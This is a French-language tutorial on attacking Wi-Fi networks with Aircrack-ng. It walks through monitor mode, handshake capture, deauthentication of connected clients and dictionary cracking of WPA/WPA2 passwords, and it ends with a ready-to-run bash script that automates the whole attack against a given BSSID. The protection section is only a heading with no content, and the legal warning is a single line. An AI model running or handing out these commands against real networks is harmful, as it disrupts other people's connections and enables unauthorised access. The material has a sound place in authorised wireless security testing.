Attaque de Réseau Sans Fil avec Aircrack-ng

Ce tutoriel vous guide à travers les étapes nécessaires pour effectuer une attaque de réseau Wi-Fi avec la suite Aircrack-ng. L'objectif est de capturer des paquets, les analyser et tenter de craquer un mot de passe Wi-Fi.

Introduction

Aircrack-ng est un ensemble d'outils permettant d'évaluer la sécurité des réseaux Wi-Fi. Il est principalement utilisé pour capturer des paquets et tenter de récupérer des mots de passe WEP/WPA/WPA2.

Prérequis

Étape 1: Vérification et Passage en Mode Monitor

Commencez par vérifier les interfaces disponibles :

iwconfig

Ensuite, activez le mode monitor sur votre interface Wi-Fi :

airmon-ng check kill
airmon-ng start wlan0

Étape 2: Capture des Paquets

Utilisez `airodump-ng` pour voir les réseaux disponibles et capturer les paquets :

airodump-ng wlan0mon

Pour capturer sur un canal spécifique :

airodump-ng --channel [CH] wlan0mon

Étape 3: Capture d'un Handshake WPA/WPA2

Ciblez un réseau particulier pour capturer le handshake :

airodump-ng --bssid [BSSID] --channel [CH] --write capture wlan0mon

Étape 4: Déconnexion des Clients (Forcer le Handshake)

Pour forcer un client à se reconnecter et capturer le handshake :

aireplay-ng --deauth 10 -a [BSSID] wlan0mon

Si cela ne fonctionne pas, essayez de cibler un client spécifique :

aireplay-ng --deauth 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon

Étape 5: Crackage du Mot de Passe

Utilisez `aircrack-ng` avec un dictionnaire pour tenter de craquer le mot de passe :

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap

Pour améliorer le crackage, vous pouvez utiliser plusieurs dictionnaires ou générateurs de mots de passe :

aircrack-ng -w /path/to/another-dict.txt -w /path/to/rockyou.txt -b [BSSID] capture-01.cap

🔧 Automatisation avec un Script Bash

Voici un script Bash amélioré pour automatiser l'attaque :


#!/bin/bash
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon &
sleep 5
pkill airodump-ng
airodump-ng --bssid $1 --channel $2 --write capture wlan0mon &
sleep 10
aireplay-ng --deauth 10 -a $1 wlan0mon
sleep 5
pkill airodump-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b $1 capture-01.cap
            

Exécution : chmod +x attaque_wifi.sh && ./attaque_wifi.sh [BSSID] [CH]

⚠️ Problèmes Courants et Solutions

🛡️ Comment se Protéger de ces Attaques ?

⚖️ Avertissement Légal

Ce tutoriel est fourni à des fins éducatives uniquement. Il est **illégal** d'attaquer un réseau sans autorisation.

Conclusion

Nous avons détaillé comment utiliser Aircrack-ng pour évaluer la sécurité des réseaux Wi-Fi. Ces connaissances doivent être utilisées de manière éthique, dans un cadre légal.